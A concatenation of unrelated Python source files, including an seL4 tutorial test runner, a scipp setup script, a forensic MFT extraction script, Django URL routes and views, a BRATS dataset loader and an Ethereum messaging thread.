system_build_config_dir = os.path.join(build_config_dir, "configs-%s" % system)
pattern = re.compile("^%s_(.*)_defconfig" % plat)
for config in os.listdir(system_build_config_dir):
matches = pattern.match(config)
if matches is None:
logging.info("Ignoring incompatible build config %s" % config)
else:
logging.info("Using build config %s" % config)
app_name = matches.group(1)
yield app_name
def run_single_test(plat, system, app, timeout, jobs):
"""
Builds and runs the solution to a given tutorial application for a given
architecture for a given system, checking that the result matches the
completion text
"""
full_name = "%s_%s_%s" % (plat, system, app)
try:
completion_text = COMPLETION[full_name]
except KeyError:
logging.error("No completion text provided for %s." % full_name)
sys.exit(1)
# clean everything before each test
make_mrproper = subprocess.Popen(['make', 'mrproper'], cwd=TOP_LEVEL_DIR)
make_mrproper.wait()
# run the test, storting output in a temporary file
temp_file = tempfile.NamedTemporaryFile(delete=True)
script_file = "%s/run.py" % (TUTORIAL_DIR)
arch = 'ia32' if plat == "pc99" else "arm"
command = '%s -a %s -j %s -p %s %s -R' % (script_file, arch, jobs, plat, app)
logging.info("Running command: %s" % command)
test = pexpect.spawn(command, cwd=TOP_LEVEL_DIR)
test.logfile = temp_file
expect_strings = [completion_text] + FAILURE_TEXTS
result = test.expect(expect_strings, timeout=timeout)
# result is the index in the completion text list corresponding to the
# text that was produced
if result == 0:
logging.info("Success!")
else:
print("<failure type='failure'>")
# print the log file's contents to help debug the failure
temp_file.seek(0)
print(xml.sax.saxutils.escape(temp_file.read()))
print_pexpect_failure(expect_strings[result])
print("</failure>")
for proc in psutil.process_iter():
if "qemu" in proc.name():
proc.kill()
temp_file.close()
def run_plat_tests(plat, system, timeout, jobs):
"""
Builds and runs all tests for a given architecture for a given system
"""
logging.info("\nRunning %s tutorial tests for %s platform..." % (system, plat))
for app in app_names(plat, system):
print("<testcase classname='sel4tutorials' name='%s_%s_%s'>" % (plat, system, app))
run_single_test(plat, system, app, timeout, jobs)
print("</testcase>")
def run_tests(timeout, jobs):
"""
Builds and runs all tests for all architectures for all systems
"""
print('<testsuite>')
for system in ['sel4', 'camkes']:
manage.main(['env', system])
manage.main(['solution'])
for plat in PLATFORMS:
run_plat_tests(plat, system, timeout, jobs)
print('</testsuite>')
def run_system_tests(system, timeout, jobs):
"""
Builds and runs all tests for all architectures for a given system
"""
print('<testsuite>')
for plat in PLATFORMS:
run_plat_tests(plat, system, timeout, jobs)
print('</testsuite>')
def set_log_level(args):
"""
Set the log level for the script from command line arguments
"""
if args.verbose:
logging.basicConfig(level=logging.DEBUG)
elif args.quiet:
logging.basicConfig(level=logging.ERROR)
else:
logging.basicConfig(level=logging.INFO)
def main():
parser = argparse.ArgumentParser(
description="Runs all tests for sel4 tutorials or camkes tutorials")
parser.add_argument('--verbose', action='store_true',
help="Output everything including debug info")
parser.add_argument('--quiet', action='store_true',
help="Suppress output except for junit xml")
parser.add_argument('--timeout', type=int, default=DEFAULT_TIMEOUT)
parser.add_argument('--system', type=str, choices=['camkes', 'sel4'])
parser.add_argument('--jobs', type=int, default=DEFAULT_JOBS)
parser.add_argument('--single', action='store_true',
help="Run a single test. To run a single test, you need to specify the platform and application.")
parser.add_argument('--plat', type=str, choices=PLATFORMS, required='--single' in sys.argv)
parser.add_argument('--app', type=str, required='--single' in sys.argv)
args = parser.parse_args()
set_log_level(args)
if args.system is None:
run_tests(args.timeout, args.jobs)
elif args.single:
print('<testsuite>')
print("<testcase classname='sel4tutorials' name='%s_%s_%s'>" % (args.plat, args.system, args.app))
run_single_test(args.plat, args.system, args.app, args.timeout, args.jobs)
print("</testcase>")
print('</testsuite>')
else:
run_system_tests(args.system, args.timeout, args.jobs)
if __name__ == '__main__':
sys.exit(main())
|
from sqlalchemy import (
MetaData,
Table,
Column,
NVARCHAR,
)
meta = MetaData()
def upgrade(migrate_engine):
meta.bind = migrate_engine
t = Table("role", meta, autoload=True)
description = Column("description", NVARCHAR(255))
description.create(t)
def downgrade(migrate_engine):
meta.bind = migrate_engine
t = Table("role", meta, autoload=True)
t.c.description.drop()
|
# SPDX-License-Identifier: BSD-3-Clause
# Copyright (c) 2022 Scipp contributors (https://github.com/scipp)
# @author Simon Heybrock
from skbuild import setup
from setuptools import find_packages
def get_version():
import subprocess
return subprocess.run(['git', 'describe', '--tags', '--abbrev=0'],
stdout=subprocess.PIPE).stdout.decode('utf8').strip()
def get_cmake_args():
# Note: We do not specify '-DCMAKE_OSX_DEPLOYMENT_TARGET' here. It is set using the
# MACOSX_DEPLOYMENT_TARGET environment variable in the github workflow. The reason
# is that I am not sure if cibuildwheel uses this for anything else apart from
# configuring the actual build.
return []
long_description = """# Multi-dimensional data arrays with labeled dimensions
*A Python library enabling a modern and intuitive way of working with scientific data in Jupyter notebooks*
**scipp** is heavily inspired by [xarray](https://xarray.pydata.org>).
It enriches raw NumPy-like multi-dimensional arrays of data by adding named dimensions and associated coordinates.
Multiple arrays can be combined into datasets.
While for many applications xarray is certainly more suitable (and definitely much more matured) than scipp, there is a number of features missing in other situations.
If your use case requires one or several of the items on the following list, using scipp may be worth considering:
- **Physical units** are stored with each data or coord array and are handled in arithmetic operations.
- **Propagation of uncertainties**.
- Support for **histograms**, i.e., **bin-edge axes**, which are by 1 longer than the data extent.
- Support for scattered data and **non-destructive binning**.
This includes first and foremost **event data**, a particular form of sparse data with arrays of random-length lists, with very small list entries.
- Support for **masks stored with data**.
- Internals written in C++ for better performance (for certain applications), in combination with Python bindings.
""" # noqa #501
setup(name='scipp',
version=get_version(),
description='Multi-dimensional data arrays with labeled dimensions',
long_description=long_description,
long_description_content_type='text/markdown',
author='Scipp contributors (https://github.com/scipp)',
url='https://scipp.github.io',
license='BSD-3-Clause',
packages=find_packages(where="src"),
package_dir={'': 'src'},
cmake_args=get_cmake_args(),
cmake_install_dir='src/scipp',
include_package_data=True,
python_requires='>=3.8',
install_requires=['confuse', 'graphlib-backport', 'numpy>=1.20'],
extras_require={
"test": ["pytest", "matplotlib", "xarray", "pandas", "pythreejs"],
'all': ['h5py', 'scipy>=1.7.0', 'graphviz'],
'interactive': [
'ipympl', 'ipython', 'ipywidgets', 'matplotlib', 'jupyterlab',
'jupyterlab-widgets', 'jupyter_nbextensions_configurator', 'nodejs',
'pythreejs'
],
})
|
#!/usr/bin/env python
#
# This file is part of libigl, a simple c++ geometry processing library.
#
# Copyright (C) 2017 Sebastian Koch <[email protected]> and Daniele Panozzo <[email protected]>
#
# This Source Code Form is subject to the terms of the Mozilla Public License
# v. 2.0. If a copy of the MPL was not distributed with this file, You can
# obtain one at http://mozilla.org/MPL/2.0/.
import sys, os
# Add the igl library to the modules search path
sys.path.insert(0, os.getcwd() + "/../")
import pyigl as igl
from shared import TUTORIAL_SHARED_PATH, check_dependencies
dependencies = ["png", "glfw"]
check_dependencies(dependencies)
temp_png = os.path.join(os.getcwd(),"out.png")
def key_down(viewer, key, modifier):
if key == ord('1'):
# Allocate temporary buffers
R = igl.eigen.MatrixXuc(1280, 800)
G = igl.eigen.MatrixXuc(1280, 800)
B = igl.eigen.MatrixXuc(1280, 800)
A = igl.eigen.MatrixXuc(1280, 800)
# Draw the scene in the buffers
viewer.core().draw_buffer(viewer.data(), False, R, G, B, A)
# Save it to a PNG
igl.png.writePNG(R, G, B, A, temp_png)
elif key == ord('2'):
# Allocate temporary buffers
R = igl.eigen.MatrixXuc()
G = igl.eigen.MatrixXuc()
B = igl.eigen.MatrixXuc()
A = igl.eigen.MatrixXuc()
# Read the PNG
igl.png.readPNG(temp_png, R, G, B, A)
# Replace the mesh with a triangulated square
V = igl.eigen.MatrixXd([[-0.5, -0.5, 0],
[0.5, -0.5, 0],
[0.5, 0.5, 0],
[-0.5, 0.5, 0]])
F = igl.eigen.MatrixXd([[0, 1, 2], [2, 3, 0]]).castint()
UV = igl.eigen.MatrixXd([[0, 0], [1, 0], [1, 1], [0, 1]])
viewer.data().clear()
viewer.data().set_mesh(V, F)
viewer.data().set_uv(UV)
viewer.core().align_camera_center(V)
viewer.data().show_texture = True
# Use the image as a texture
viewer.data().set_texture(R, G, B)
else:
return False
return True
if __name__ == "__main__":
V = igl.eigen.MatrixXd()
F = igl.eigen.MatrixXi()
# Load meshes in OFF format
igl.readOFF(TUTORIAL_SHARED_PATH + "bunny.off", V, F)
viewer = igl.glfw.Viewer()
print(
"Usage: Press 1 to render the scene and save it in a png. \nPress 2 to load the saved png and use it as a texture.")
viewer.callback_key_down = key_down
viewer.data().set_mesh(V, F)
viewer.launch()
os.remove(temp_png)
|
#!/usr/bin/python
# Sample program or step 5 in becoming a DFIR Wizard!
# No license as this code is simple and free!
import sys
import pytsk3
import datetime
import pyewf
class ewf_Img_Info(pytsk3.Img_Info):
def __init__(self, ewf_handle):
self._ewf_handle = ewf_handle
super(ewf_Img_Info, self).__init__(
url="", type=pytsk3.TSK_IMG_TYPE_EXTERNAL)
def close(self):
self._ewf_handle.close()
def read(self, offset, size):
self._ewf_handle.seek(offset)
return self._ewf_handle.read(size)
def get_size(self):
return self._ewf_handle.get_media_size()
filenames = pyewf.glob("SSFCC-Level5.E01")
ewf_handle = pyewf.handle()
ewf_handle.open(filenames)
imagehandle = ewf_Img_Info(ewf_handle)
partitionTable = pytsk3.Volume_Info(imagehandle)
for partition in partitionTable:
print partition.addr, partition.desc, "%ss(%s)" % (partition.start, partition.start * 512), partition.len
if 'NTFS' in partition.desc:
filesystemObject = pytsk3.FS_Info(imagehandle, offset=(partition.start*512))
fileobject = filesystemObject.open("/$MFT")
print "File Inode:",fileobject.info.meta.addr
print "File Name:",fileobject.info.name.name
print "File Creation Time:",datetime.datetime.fromtimestamp(fileobject.info.meta.crtime).strftime('%Y-%m-%d %H:%M:%S')
outFileName = str(partition.addr)+fileobject.info.name.name
print outFileName
outfile = open(outFileName, 'w')
filedata = fileobject.read_random(0,fileobject.info.meta.size)
outfile.write(filedata)
outfile.close
|
import os
from django.conf import settings
from django.core.exceptions import PermissionDenied
from annotation.models import ManualVariantEntryType
from annotation.models.models import ManualVariantEntryCollection, ManualVariantEntry
from annotation.tasks.process_manual_variants_task import ManualVariantsPostInsertTask, get_manual_variant_tuples
from library.django_utils.django_file_utils import get_import_processing_dir
from library.utils import full_class_name
from library.vcf_utils import write_vcf_from_tuples
from snpdb.models.models_enums import ImportSource
from snpdb.models.models_genome import GenomeBuild
from upload.models import UploadPipeline, UploadedFile, UploadStep, UploadedManualVariantEntryCollection
from upload.models.models_enums import UploadedFileTypes, UploadStepTaskType, VCFPipelineStage, UploadStepOrigin
from upload.upload_processing import process_upload_pipeline
class CreateManualVariantForbidden(PermissionDenied):
pass
def can_create_variants(user) -> bool:
can_create = settings.UPLOAD_ENABLED and settings.VARIANT_MANUAL_CREATE
can_create &= user.is_superuser or settings.VARIANT_MANUAL_CREATE_BY_NON_ADMIN
return can_create
def check_can_create_variants(user):
if not can_create_variants(user):
raise CreateManualVariantForbidden()
def create_manual_variants(user, genome_build: GenomeBuild, variants_text: str):
check_can_create_variants(user)
mvec = ManualVariantEntryCollection.objects.create(user=user,
genome_build=genome_build)
variants_list = []
for i, line in enumerate(variants_text.split('\n')):
line = line.strip()
entry_type = ManualVariantEntry.get_entry_type(line)
kwargs = {"manual_variant_entry_collection": mvec,
"line_number": i + 1,
"entry_text": line,
"entry_type": entry_type}
if entry_type == ManualVariantEntryType.UNKNOWN:
kwargs["error_message"] = f"Couldn't determine type of '{line}'"
mve = ManualVariantEntry.objects.create(**kwargs)
if entry_type != ManualVariantEntryType.UNKNOWN:
try:
variants_list.extend(get_manual_variant_tuples(mve))
except ValueError as ve:
mve.error_message = f"Error parsing {entry_type}: '{ve}'"
mve.save()
if not variants_list:
# Pipeline would have just hung forever
raise ValueError("No valid variants to create!")
# Because we need to normalise / insert etc, it's easier just to write a VCF
# and run through upload pipeline
working_dir = get_import_processing_dir(mvec.pk, "manual_variants")
vcf_filename = os.path.join(working_dir, "manual_variant_entry.vcf")
write_vcf_from_tuples(vcf_filename, variants_list)
uploaded_file = UploadedFile.objects.create(path=vcf_filename,
import_source=ImportSource.WEB,
name='Manual Variant Entry',
user=user,
file_type=UploadedFileTypes.VCF_INSERT_VARIANTS_ONLY,
visible=False)
UploadedManualVariantEntryCollection.objects.create(uploaded_file=uploaded_file,
collection=mvec)
upload_pipeline = UploadPipeline.objects.create(uploaded_file=uploaded_file)
add_manual_variant_upload_steps(upload_pipeline)
process_upload_pipeline(upload_pipeline)
return mvec
def add_manual_variant_upload_steps(upload_pipeline):
mv_post_insert_clazz = ManualVariantsPostInsertTask
class_name = full_class_name(mv_post_insert_clazz)
UploadStep.objects.create(upload_pipeline=upload_pipeline,
name="ManualVariantsPostInsertTask",
origin=UploadStepOrigin.USER_ADDITION,
sort_order=10,
task_type=UploadStepTaskType.CELERY,
pipeline_stage_dependency=VCFPipelineStage.DATA_INSERTION,
script=class_name)
|
from ..i18n import i18n
class EasyBackupException(Exception):
def __init__(self, code, **kwargs):
self.code = code
self.message = i18n.t(code, **kwargs)
self.kwargs = kwargs
def __str__(self):
return self.message
class BackupParseNameError(EasyBackupException):
pass
class RepositoryLinkNotFound(EasyBackupException):
pass
class BuilderChainningIncompatibility(EasyBackupException):
pass
|
#
# OtterTune - urls.py
#
# Copyright (c) 2017-18, Carnegie Mellon University Database Group
#
import debug_toolbar
from django.conf.urls import include, url
from django.contrib import admin
from django.contrib.staticfiles.views import serve
from django.views.decorators.cache import never_cache
from website import settings
from website import views as website_views
admin.autodiscover()
# pylint: disable=line-too-long,invalid-name
urlpatterns = [
# URLs for user registration & login
url(r'^signup/', website_views.signup_view, name='signup'),
url(r'^login/', website_views.login_view, name='login'),
url(r'^logout/$', website_views.logout_view, name='logout'),
url(r'^change_password/', website_views.change_password_view, name='change_password'),
# URLs for project views
url(r'^$', website_views.redirect_home),
url(r'^projects/$', website_views.home_projects_view, name='home_projects'),
url(r'^projects/new/$', website_views.create_or_edit_project, name='new_project'),
url(r'^projects/(?P<project_id>[0-9]+)/edit/$', website_views.create_or_edit_project, name='edit_project'),
url(r'^projects/delete/$', website_views.delete_project, name="delete_project"),
# URLs for session views
url(r'^projects/(?P<project_id>[0-9]+)/sessions$', website_views.project_sessions_view, name='project_sessions'),
url(r'^projects/(?P<project_id>[0-9]+)/sessions/(?P<session_id>[0-9]+)/$', website_views.session_view, name='session'),
url(r'^projects/(?P<project_id>[0-9]+)/sessions/new/$', website_views.create_or_edit_session, name='new_session'),
url(r'^projects/(?P<project_id>[0-9]+)/sessions/(?P<session_id>[0-9]+)/edit/$', website_views.create_or_edit_session, name='edit_session'),
url(r'^projects/(?P<project_id>[0-9]+)/sessions/(?P<session_id>[0-9]+)/editKnobs/$', website_views.edit_knobs, name='edit_knobs'),
url(r'^projects/(?P<project_id>[0-9]+)/sessions/delete/$', website_views.delete_session, name='delete_session'),
# URLs for result views
url(r'^new_result/', website_views.new_result, name='new_result'),
url(r'^projects/(?P<project_id>[0-9]+)/sessions/(?P<session_id>[0-9]+)/results/(?P<result_id>[0-9]+)/$', website_views.result_view, name='result'),
url(r'^projects/(?P<project_id>[0-9]+)/sessions/(?P<session_id>[0-9]+)/workloads/(?P<wkld_id>[0-9]+)/$', website_views.workload_view, name='workload'),
url(r'^projects/(?P<project_id>[0-9]+)/sessions/(?P<session_id>[0-9]+)/knobs/(?P<data_id>[0-9]+)/$', website_views.knob_data_view, name='knob_data'),
url(r'^projects/(?P<project_id>[0-9]+)/sessions/(?P<session_id>[0-9]+)/metrics/(?P<data_id>[0-9]+)/$', website_views.metric_data_view, name='metric_data'),
url(r'^projects/(?P<project_id>[0-9]+)/sessions/(?P<session_id>[0-9]+)/results/(?P<result_id>[0-9]+)/status$', website_views.tuner_status_view, name="tuner_status"),
# URLs for the DBMS knob & metric reference pages
url(r'^ref/(?P<dbms_name>.+)/(?P<version>.+)/knobs/(?P<knob_name>.+)/$', website_views.dbms_knobs_reference, name="dbms_knobs_ref"),
url(r'^ref/(?P<dbms_name>.+)/(?P<version>.+)/metrics/(?P<metric_name>.+)/$', website_views.dbms_metrics_reference, name="dbms_metrics_ref"),
# URLs to the helper functions called by the javascript code
url(r'^get_workload_data/', website_views.get_workload_data),
url(r'^get_data/', website_views.get_timeline_data),
url(r'^get_result_data_file/', website_views.download_next_config),
# Admin URLs
# Uncomment the admin/doc line below to enable admin documentation:
# url(r'^admin/doc/', include('django.contrib.admindocs.urls')),
url(r'^admin/', admin.site.urls),
# Static URL
url(r'^static/(?P<path>.*)$', never_cache(serve)),
# Back door
url(r'^query_and_get/(?P<upload_code>[0-9a-zA-Z]+)$', website_views.give_result, name="backdoor"),
]
if settings.DEBUG:
urlpatterns.insert(0, url(r'^__debug__/', include(debug_toolbar.urls)))
|
"""
:codeauthor: Jayesh Kariya <[email protected]>
"""
import sys
import salt.modules.pam as pam
from tests.support.mock import mock_open, patch
from tests.support.unit import TestCase, skipIf
MOCK_FILE = "ok ok ignore "
@skipIf(sys.platform.startswith("openbsd"), "OpenBSD does not use PAM")
class PamTestCase(TestCase):
"""
Test cases for salt.modules.pam
"""
# 'read_file' function tests: 1
def test_read_file(self):
"""
Test if the parsing function works
"""
with patch("os.path.exists", return_value=True), patch(
"salt.utils.files.fopen", mock_open(read_data=MOCK_FILE)
):
self.assertListEqual(
pam.read_file("/etc/pam.d/login"),
[
{
"arguments": [],
"control_flag": "ok",
"interface": "ok",
"module": "ignore",
}
],
)
|
import datetime as dt
def get_query(type=0, **kwargs):
query = False
if type == 0:
query = [
{
'$sort': {
'datetime': -1
}
}, {
'$limit': 1
}
]
elif type == 1:
dnow = dt.datetime.now()
date_from = kwargs['date_from'] if 'date_from' in kwargs else dnow - \
dt.timedelta(30)
date_to = kwargs['date_to'] if 'date_to' in kwargs else dnow
query = [
{
'$match': {
'datetime': {
'$gte': date_from,
'$lt': date_to
}
}
}, {
'$group': {
'_id': {
'$dayOfYear': '$datetime'
},
'temp_data': {
'$first': '$$ROOT'
}
}
}, {
'$sort': {
'_id': 1
}
}, {
'$replaceRoot': {
'newRoot': '$temp_data'
}
}
]
return query
|
from os import listdir
from os.path import join, isfile
import random
from scipy import io as sio
import numpy as np
import copy
from ipdb import set_trace as st
from math import ceil
class BRATS():
def __init__(self,opt,phase):
super(BRATS, self).__init__()
random.seed(0)
self.dataroot = opt.dataroot
self.root = join(self.dataroot,phase)
self.flist = []
self.root = opt.dataroot
## numpy file is a list of filename paths for each slice of brain images.
## For fast data loading, the brain images are saved and loaded by slice-by-slice.
self.flist = np.load(join(opt.dataroot, phase+'_flist_main_z.npy'))
self.N = 4
self.nCh_out = 1
self.nCh_in = self.N*self.nCh_out + self.N #opt.nCh_in
self.nY = 240
self.nX = 240
self.len = len(self.flist)
self.fExp = ['O','C','T','F'] #'S'
self.AUG = (phase=='train') and opt.AUG
self.use_norm_std = (not opt.wo_norm_std)
self.N_null = opt.N_null
# Here, for dropout input (not used)
self.null_N_set = [x+1 for x in range(opt.N_null)] #[1,2,3,4]
self.list_for_null = []
for i in range(self.N):
self.list_for_null.append( self.get_null_list_for_idx(i) )
def get_info(self,opt):
opt.nCh_in = self.nCh_in
opt.nCh_out= self.nCh_out
opt.nY = self.nY
opt.nX = self.nX
return opt
def getBatch(self, start, end):
nB = end-start
end = min([end,self.len])
start = end-nB
batch = self.flist[start:end]
sz_a = [end-start, self.nCh_out, self.nY, self.nX]
sz_M = [end-start, self.nCh_out, self.nY, self.nX]
target_class_idx = np.empty([end-start,1],dtype=np.uint8)
O_img = np.empty(sz_a, dtype=np.float32)
C_img = np.empty(sz_a, dtype=np.float32)
T_img = np.empty(sz_a, dtype=np.float32)
F_img = np.empty(sz_a, dtype=np.float32)
target_img = np.empty(sz_a, dtype=np.float32)
O_mask = np.zeros(sz_M, dtype=np.float32)
C_mask = np.zeros(sz_M, dtype=np.float32)
T_mask = np.zeros(sz_M, dtype=np.float32)
F_mask = np.zeros(sz_M, dtype=np.float32)
targ_idx = random.randint(0,self.N-1)
tar_class_bools = [x==targ_idx for x in range(self.N) ]
for iB, aBatch in enumerate(batch):
O_tmp = self.read_mat(join(self.root, aBatch+'O.mat'))
C_tmp = self.read_mat(join(self.root, aBatch+'C.mat'))
T_tmp = self.read_mat(join(self.root, aBatch+'T.mat'))
F_tmp = self.read_mat(join(self.root, aBatch+'F.mat'))
if self.AUG:
if random.randint(0,1):
O_tmp = np.flip(O_tmp, axis=1)
C_tmp = np.flip(C_tmp, axis=1)
T_tmp = np.flip(T_tmp, axis=1)
F_tmp = np.flip(F_tmp, axis=1)
scale = random.uniform(0.9,1.1)
O_tmp = O_tmp*scale
C_tmp = C_tmp*scale
T_tmp = T_tmp*scale
F_tmp = F_tmp*scale
O_img[iB,:,:,:] = O_tmp
C_img[iB,:,:,:] = C_tmp
T_img[iB,:,:,:] = T_tmp
F_img[iB,:,:,:] = F_tmp
##
if targ_idx==0:
target_img[iB,:,:,:] = O_img[iB,:,:,:]
O_mask[iB,0,:,:] = 1.
elif targ_idx==1:
target_img[iB,:,:,:] = C_img[iB,:,:,:]
C_mask[iB,0,:,:] = 1.
elif targ_idx==2:
target_img[iB,:,:,:] = T_img[iB,:,:,:]
T_mask[iB,0,:,:] = 1.
elif targ_idx==3:
target_img[iB,:,:,:] = F_img[iB,:,:,:]
F_mask[iB,0,:,:] = 1.
else:
st()
target_class_idx[iB] = targ_idx
return target_class_idx, O_img, C_img, T_img, F_img, O_mask, C_mask, T_mask, F_mask, tar_class_bools, target_img
def getBatch_dir(self, start, end, _id=-1):
nB = end-start
end = min([end,self.len])
start = end-nB
batch = self.flist[start:end]
sz_a = [end-start, self.nCh_out, self.nY, self.nX]
sz_M = [end-start, self.nCh_out, self.nY, self.nX]
target_class_idx = np.empty([end-start,1],dtype=np.uint8)
O_img = np.empty(sz_a, dtype=np.float32)
C_img = np.empty(sz_a, dtype=np.float32)
T_img = np.empty(sz_a, dtype=np.float32)
F_img = np.empty(sz_a, dtype=np.float32)
target_img = np.empty(sz_a, dtype=np.float32)
O_mask = np.zeros(sz_M, dtype=np.float32)
C_mask = np.zeros(sz_M, dtype=np.float32)
T_mask = np.zeros(sz_M, dtype=np.float32)
F_mask = np.zeros(sz_M, dtype=np.float32)
'''Thins to change for new CollaGAN DB (1/3)'''
if _id==-1:
targ_idx = random.randint(0,self.N-1)
else:
targ_idx = _id
tar_class_bools = [x==targ_idx for x in range(self.N) ]
for iB, aBatch in enumerate(batch):
a_dir = aBatch
O_tmp = self.read_mat(join(self.root, aBatch+'O.mat'))
C_tmp = self.read_mat(join(self.root, aBatch+'C.mat'))
T_tmp = self.read_mat(join(self.root, aBatch+'T.mat'))
F_tmp = self.read_mat(join(self.root, aBatch+'F.mat'))
if self.AUG:
if random.randint(0,1):
O_tmp = np.flip(O_tmp, axis=1)
C_tmp = np.flip(C_tmp, axis=1)
T_tmp = np.flip(T_tmp, axis=1)
F_tmp = np.flip(F_tmp, axis=1)
scale = random.uniform(0.9,1.1)
O_tmp = O_tmp*scale
C_tmp = C_tmp*scale
T_tmp = T_tmp*scale
F_tmp = F_tmp*scale
O_img[iB,:,:,:] = O_tmp
C_img[iB,:,:,:] = C_tmp
T_img[iB,:,:,:] = T_tmp
F_img[iB,:,:,:] = F_tmp
##
if targ_idx==0:
target_img[iB,:,:,:] = O_img[iB,:,:,:]
O_mask[iB,0,:,:] = 1.
elif targ_idx==1:
target_img[iB,:,:,:] = C_img[iB,:,:,:]
C_mask[iB,0,:,:] = 1.
elif targ_idx==2:
target_img[iB,:,:,:] = T_img[iB,:,:,:]
T_mask[iB,0,:,:] = 1.
elif targ_idx==3:
target_img[iB,:,:,:] = F_img[iB,:,:,:]
F_mask[iB,0,:,:] = 1.
else:
st()
target_class_idx[iB] = targ_idx
return target_class_idx, O_img, C_img, T_img, F_img, O_mask, C_mask, T_mask, F_mask, tar_class_bools, target_img, a_dir
def shuffle(self, seed=0):
random.seed(seed)
random.shuffle(self.flist)
def name(self):
return 'BRATS dataset'
def __len__(self):
return self.len
def get_null_list_for_idx(self, idx):
a_list = []
for i_null in self.null_N_set:
tmp_a = []
if i_null == 1:
tmp = [ bX==idx for bX in range(self.N) ]
tmp_a.append(tmp)
elif i_null ==2:
for i_in in range(self.N):
if not i_in==idx:
tmp = [ bX in [i_in, idx] for bX in range(self.N) ]
tmp_a.append(tmp)
elif i_null ==3:
for i_in in range(self.N):
for i2_in in range(self.N):
if not (i_in==i2_in or (i_in==idx or i2_in==idx)):
tmp = [ ( bX in [i_in, i2_in, idx]) for bX in range(self.N) ]
tmp_a.append(tmp)
elif i_null ==4:
for i4_in in range(self.N):
if not (i4_in==idx):
tmp = [ (bX==idx or (not bX==i4_in)) for bX in range(self.N) ]
tmp_a.append(tmp)
else:
st()
a_list.append(tmp_a)
return a_list
@staticmethod
def read_mat(filename, var_name="img"):
mat = sio.loadmat(filename)
return mat[var_name]
if __name__ == "__main__":
from options.star_options import BaseOptions
opt = BaseOptions().parse()
DB_train = BRATS(opt,'train')
st()
idx,a,b,c,d, am,bm,cm,dm, bools, tar = DB_train.getBatch(0,1)
print('Return')
|
from web3 import Web3, HTTPProvider
from threading import Thread
from queue import Queue
import binascii
from scraper.scraper import Scraper
class Messenger(Thread):
def __init__(self, report_q, private_key, testnet):
Thread.__init__(self)
self.report_q = report_q
self.private_key = private_key
self.testnet = testnet
Thread.daemon = True
def run(self):
# Abi of the messaging smart contract
# abi = '''[{"constant":true,"inputs":[{"name":"","type":"address"}],"name":"last_msg_index","outputs":[{"name":"","type":"uint256"}],"payable":false,"type":"function"},{"constant":false,"inputs":[{"name":"_key","type":"string"},{"name":"_type","type":"string"}],"name":"setPublicKey","outputs":[],"payable":false,"type":"function"},{"constant":true,"inputs":[{"name":"_who","type":"address"},{"name":"_index","type":"uint256"}],"name":"newMessage","outputs":[{"name":"","type":"bool"}],"payable":false,"type":"function"},{"constant":true,"inputs":[{"name":"_who","type":"address"},{"name":"_index","type":"uint256"}],"name":"getMessageByIndex","outputs":[{"name":"","type":"address"},{"name":"","type":"string"},{"name":"","type":"uint256"}],"payable":false,"type":"function"},{"constant":true,"inputs":[{"name":"","type":"address"}],"name":"keys","outputs":[{"name":"key","type":"string"},{"name":"key_type","type":"string"}],"payable":false,"type":"function"},{"constant":true,"inputs":[{"name":"_who","type":"address"}],"name":"getPublicKey","outputs":[{"name":"_key","type":"string"},{"name":"_key_type","type":"string"}],"payable":false,"type":"function"},{"constant":true,"inputs":[{"name":"","type":"address"},{"name":"","type":"uint256"}],"name":"messages","outputs":[{"name":"from","type":"address"},{"name":"text","type":"string"},{"name":"time","type":"uint256"}],"payable":false,"type":"function"},{"constant":false,"inputs":[{"name":"_to","type":"address"},{"name":"_text","type":"string"}],"name":"sendMessage","outputs":[],"payable":false,"type":"function"},{"constant":true,"inputs":[{"name":"_who","type":"address"}],"name":"getLastMessage","outputs":[{"name":"","type":"address"},{"name":"","type":"string"},{"name":"","type":"uint256"}],"payable":false,"type":"function"},{"constant":true,"inputs":[{"name":"_owner","type":"address"}],"name":"lastIndex","outputs":[{"name":"","type":"uint256"}],"payable":false,"type":"function"},{"constant":true,"inputs":[],"name":"message_staling_period","outputs":[{"name":"","type":"uint256"}],"payable":false,"type":"function"},{"anonymous":false,"inputs":[{"indexed":true,"name":"_sender","type":"address"},{"indexed":true,"name":"_receiver","type":"address"},{"indexed":false,"name":"_time","type":"uint256"},{"indexed":false,"name":"message","type":"string"}],"name":"Message","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"name":"_sender","type":"address"},{"indexed":false,"name":"_key","type":"string"},{"indexed":false,"name":"_keytype","type":"string"}],"name":"PublicKeyUpdated","type":"event"}]'''
if self.testnet:
web3 = Web3(Web3.HTTPProvider('https://ropsten.infura.io/v3/29e5c62848414895b549aa4befebe614'))
else:
web3 = Web3(Web3.HTTPProvider('https://mainnet.infura.io/v3/29e5c62848414895b549aa4befebe614'))
acc = web3.eth.account.privateKeyToAccount(self.private_key)
if not web3.isConnected():
Scraper.log("Messaging:\tNo connection established")
# Messaging smart contract to use if not sending a direct transaction to the contract owner
# messaging = web3.eth.contract(address="0xCdcDD44f7f617B965983a8C1bB0B845A5766FEbA", abi=abi)
Scraper.log("Messaging:\tWaiting for messages")
nonce = 1
while True:
(address, message) = self.report_q.get()
if message is None:
break
message = "Hello, We scanned a smart contract you deployed and found a vulnrability in it, here is the report:\n" + message
transaction = {
'to' : web3.toChecksumAddress(address),
'from' : acc.address,
'value' : 0,
'gasPrice' : web3.eth.gasPrice,
'nonce' : web3.eth.getTransactionCount(acc.address),
'data' : message.encode('utf-8').hex()
}
transaction['gas'] = web3.eth.estimateGas(transaction)
# transaction = messaging.functions.sendMessage(address, message).buildTransaction({'from': acc.address, 'nonce': '0x%02x' % web3.eth.getTransactionCount(address)} # Use this to send the message to a messaging smart contract)
signed = acc.signTransaction(transaction)
tx = web3.eth.sendRawTransaction(signed.rawTransaction)
Scraper.log("Messaging:\tSent message")
Scraper.log("Messaging:\tReceived terminator, shutting down...")
|
from django.shortcuts import render
from django.views.decorators.csrf import csrf_exempt
from django.http import JsonResponse
from django.utils import timezone
from django.core import serializers
from .models import *
from user.models import *
from urllib.parse import quote, unquote
from project.config import APIConfig
import json, requests, datetime
APP_LIST_URL = APIConfig['APP_LIST_URL']
def timestamp_to_date(js_timestamp):
return datetime.datetime.fromtimestamp(int(js_timestamp) / 1000).date()
def calc_subscription_bill(sub_type, bill):
bill_types = {
'W': [ 'week_bill', { 'M': 4, 'Y': 52 } ],
'M': [ 'month_bill', { 'Y': 12 } ],
'Y': [ 'year_bill', {} ],
}
bills = {
'week_bill': 0,
'month_bill': 0,
'year_bill': 0,
}
if sub_type == 'L':
return bills
bills[bill_types[sub_type][0]] = bill
for k, v in bill_types[sub_type][1].items():
bills[bill_types[k][0]] = bill * v
return bills
@csrf_exempt
